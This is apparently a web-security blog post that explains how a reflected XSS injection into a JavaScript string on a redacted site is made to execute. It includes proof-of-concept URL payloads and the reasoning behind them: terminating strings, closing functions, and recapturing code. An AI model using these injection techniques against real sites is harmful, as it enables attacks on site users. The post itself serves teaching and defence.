Entertaining insights into web security.

Know Your JavaScript (Injections)

HTML injection vulnerabilities make a great Voight-Kampff test for proving you care about security. We need some kind of tool to deal with developers who take refuge in the excuse, “But it’s not exploitable.”

Companies like MasterCard and VISA created the PCI standard to make sure web sites care about vulns like XSS. Parts of the standard are pretty strict, to the point where a site faces fines or becomes unable to process credit cards if it fails to fix vulns quickly. This also means that every once in a while a site’s developers refuse to acknowledge a vuln is valid because they don’t see an alert() pop up.

The poor dears.

(1) Probe for Reflected Values

Let’s examine Exhibit One: A Means of Writing Arbitrary Mark-up into a Page. In this case, the URL parameter’s value is written into a JavaScript string variable called pageUrl. HTML injection doesn’t get much easier than this.

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27

The code now has an extra apostrophe hanging out at the end of pageUrl:
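A hedged reconstruction of the reflected assignment (only pageUrl is named in the article; the surrounding code is assumed):

```javascript
// Hypothetical reconstruction. The injected %27 decodes to an apostrophe
// that closes nothing, leaving the string literal unterminated:
var pageUrl = 'a'';
```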

But when the devs go to check the vuln, they conclude that it’s not possible to trigger an alert(). For example, they update the payload with something like this:

https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//

None of the variations on the payload seem to work. They terminated the string properly. The value gets reflected. But nothing results in JavaScript execution.
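The reflected line presumably looked something like the following reconstruction (the indentation and surrounding code are assumptions):

```javascript
// Hypothetical reconstruction of the reflected assignment. The payload
// terminates the string and the // comments out the page's own closing
// quote, so the syntax parses cleanly. And yet no alert box appears:
    var pageUrl = 'a';alert(9)//';
```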

(2) Break Out of One Context, Break Another

It’s too bad our developers didn’t take the time to, you know, debug the problem. After all, HTML injection attacks are a coding exercise like any other. (Although perhaps a bit more fun.)

For starters, our payload is reflected inside a JavaScript function scope. Maybe the SetLanCookie() function just isn’t being called within the page? That would explain why the alert() never runs. A reasonable step is to close the function with a curly brace and dangle a naked alert() within the script block.
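A hypothetical payload along the lines of a';}alert(9) would produce something like this reconstruction (function and variable names from the article; everything else is assumed):

```javascript
// Hypothetical reconstruction of the reflected block. The curly brace
// closes the function early, but the page's own closing quote and brace
// are still sitting there after the reflection point:
function SetLanCookie() {
    var pageUrl = 'a';}alert(9)';
    // ...the rest of the original function body dangles here...
}
```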

But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with commenting it out with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a =' inside the payload.
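The terminate-and-recapture trick can be checked outside a browser. Here’s a minimal runnable sketch, with a probe() flag standing in for alert() since alert() only exists in browsers; the payload and variable names are illustrative, not taken from the site:

```javascript
// probe() stands in for alert(9) so we can observe execution in Node.
let fired = false;
function probe() { fired = true; }

// Imagine the server reflects the payload  a'; probe(); var a='
// into the middle of: var pageUrl = '<PAYLOAD>&more=stuff';
// The payload closes the original string, runs its own code, then opens
// a new string so the page's trailing quote stays balanced:
var pageUrl = 'a'; probe(); var a='&more=stuff';

console.log(fired);    // true: the injected call executed
console.log(pageUrl);  // "a": the original variable keeps a clean value
```

The point of the trailing var a=' is purely syntactic hygiene: it swallows the leftover quote so the whole script block still parses.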

What we need to do is re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack: just update the payload with an opening function statement, as below:

The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).
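A hedged reconstruction of that reflected block (identifiers other than SetLanCookie and pageUrl are assumed):

```javascript
// Hypothetical reconstruction, with whitespace added for readability.
// The payload closes the string and the function, fires the alert, then
// opens a new function to swallow the page's dangling code:
function SetLanCookie() {
    var pageUrl = 'a';
}
alert(9);
function () {
    // SyntaxError: a function statement requires a name
    var a = '';
    // ...the rest of the original function body...
}
```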

Oops. We created a function, but forgot to name it. JavaScript is happy to let functions go nameless, but only in expression position: a bare, anonymous function statement is a syntax error. For example, the following syntax creates and executes an anonymous function that generates an alert:

(function(){alert(9)})()

We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.
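Both forms can be verified outside a browser. A minimal sketch, with a return value standing in for the alert(9) since alert() only exists in browsers:

```javascript
// An IIFE: wrapping the function in parentheses makes it an expression,
// and the trailing () invokes it immediately.
const viaIife = (function () { return 9; })();

// Assigning the function to a var also puts it in expression position,
// which is the trick the payload relies on:
var fn = function () { return 9; };
const viaVar = fn();

console.log(viaIife, viaVar);  // 9 9
```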

Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:
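A hedged reconstruction of that final reflected block (again, everything except SetLanCookie and pageUrl is an assumption):

```javascript
// Hypothetical reconstruction, spacing added for clarity. Every string
// and brace is balanced, so the parser is happy and the alert fires:
function SetLanCookie() {
    var pageUrl = 'a';
}
alert(9);
var x = function () {
    var a = '';
    // ...the page's original trailing code, swallowed by the new function...
}
```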

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.